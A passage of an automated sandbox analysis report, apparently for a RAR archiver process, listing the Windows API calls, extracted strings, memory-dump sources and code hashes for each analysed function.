                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02D06765E1E91BC5F788FB81A845738E6617F547B9FC50774C41D095928FED34548320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EE94549
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction ID: 8d4d04eb3771aa19023872058ee2de40c7508bda87ac48edcf54ace04aa6d5f0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66C02B21E09881C0E604736D88850342110BF85735FD00330C13D056E0CF9800EB0310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                              • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction ID: 9ebaa2f8b1c14e7064085798909d1d2196f7640e6c8e96efc365190be2573208
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF0A42290C642C5FB65BB64E4403B4B6A0EB01BB8FD95370D67D050D8CEA8D996C760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAEE9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAF01
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAF19
                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAF75
                                                                                                                                                                                                                              • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBAFB0
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBB23B
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBB244
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF74EE72E4C), ref: 00007FF74EEBB287
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                                                                              • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                                                                              • API String ID: 3483800833-4165214152
                                                                                                                                                                                                                              • Opcode ID: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
                                                                                                                                                                                                                              • Instruction ID: a131e118d7fd8bbd6604c9ebb8a068c00e894d1a3a12b41836fc693400d9e68c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77C17022A0DA52C9FB20FF65E8502B9B7A0FB447A4F840135DA8D47B95DFBCD645C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Sleepswprintf
                                                                                                                                                                                                                              • String ID: $%ls%0*u.rev
                                                                                                                                                                                                                              • API String ID: 407366315-3491873314
                                                                                                                                                                                                                              • Opcode ID: fbf9e5f12b149fcf5a5e6fa2f3a063ac4de3e9cb50c152702693afccae20d4e1
                                                                                                                                                                                                                              • Instruction ID: 4a676c5e3756e14b48bce1530bfdf15220f90acc6f60aeff990dd7b7d44a38da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbf9e5f12b149fcf5a5e6fa2f3a063ac4de3e9cb50c152702693afccae20d4e1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E02D432A0C6A2C6FB20FB25E4445ADB3A5FB887A4F810139DE9D47799DEBCE445C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • new.LIBCMT ref: 00007FF74EE74BD8
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EEBB6D0: Sleep.KERNEL32(?,?,?,?,00007FF74EE8CBED,?,00000000,?,00007FF74EEB7A8C), ref: 00007FF74EEBB730
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE91E80: CreateFileW.KERNELBASE ref: 00007FF74EE91F4A
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE91E80: GetLastError.KERNEL32 ref: 00007FF74EE91F59
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE91E80: CreateFileW.KERNELBASE ref: 00007FF74EE91F99
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE91E80: GetLastError.KERNEL32 ref: 00007FF74EE91FA2
                                                                                                                                                                                                                                • Part of subcall function 00007FF74EE91E80: SetFileTime.KERNEL32 ref: 00007FF74EE91FF1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                                                                              • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                                                                              • API String ID: 2965465231-221484280
                                                                                                                                                                                                                              • Opcode ID: a2a324eddf7a9e52bc22fac218f24dc088c81194899047d0e28de429ba85f286
                                                                                                                                                                                                                              • Instruction ID: c3cefbddbb37d5ebce97bf9f6915f0ded2e246cc25d84c0a24d85c8e039cb5ca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2a324eddf7a9e52bc22fac218f24dc088c81194899047d0e28de429ba85f286
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDF18962A0DAA6C5FB60FB12E0402BEA7A1FB45BA4FC40435DA8D07785DFBCD955C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                              • Instruction ID: a66e49b1aebbfc101dfb041236023cad3717a55dd8a1be20372197f2a3fce2bf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1317336608F91C6EB60EF25E8406AEB3A4FB84764F940135EA9D43B58DF7CD545CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3398352648-0
                                                                                                                                                                                                                              • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                              • Instruction ID: 4aca470190f6bf04a7844025183ffbe120a619899cea49c9e30f623111803ced
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B211723261CB52C2F750EF65F84056AB3A1FB88BA0F844435EA8E47A28CF7CD504CB50
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1039280553-0
                                                                                                                                                                                                                              • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                              • Instruction ID: 9009b9cf68889111154d40c011d3e7593a9543d5a9736065e6b9c07a029ffb7e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E215E25B1C662D7FA00BB69A804539B761FF89BB1F940230EE4A07B64DE7CE446CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2092733347-0
                                                                                                                                                                                                                              • Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                              • Instruction ID: 872e78d861ad1f85a4bc29784d5ba6ab3d216c71f291132a52b1f559a45ebe40
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 315179B2B18661CEEB54EFB8E4401AC77B1F708798B90402ADE4E57B58EF78D545CB10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937898374.00007FF74EF18000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937944383.00007FF74EF1E000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_110_2_7ff74ee70000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: exe$rar$rebuilt.$sfx
                                                                                                                                                                                                                              • API String ID: 0-13699710
                                                                                                                                                                                                                              • Opcode ID: 2225ed33e2d2381bcbca4562f0b7de7947310cd957fba0cf049a1af6971fb554
                                                                                                                                                                                                                              • Instruction ID: bc8f5f6b33ebdb487a1e96b24039014c533dc55e4d4a71057bc545398f10702e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2225ed33e2d2381bcbca4562f0b7de7947310cd957fba0cf049a1af6971fb554
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47816021A0C6E2C5FE20FB64D4152F9A392BF853A4FC04535D98D0B6DADEADE645C360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000006E.00000002.1937482908.00007FF74EE71000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF74EE70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937440002.00007FF74EE70000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937632501.00007FF74EEF8000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937673719.00007FF74EEF9000.00000008.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EEFA000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF04000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF0E000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000006E.00000002.1937723078.00007FF74EF16000.00000004.00000001.01000000.00000022.sdmpDownload File
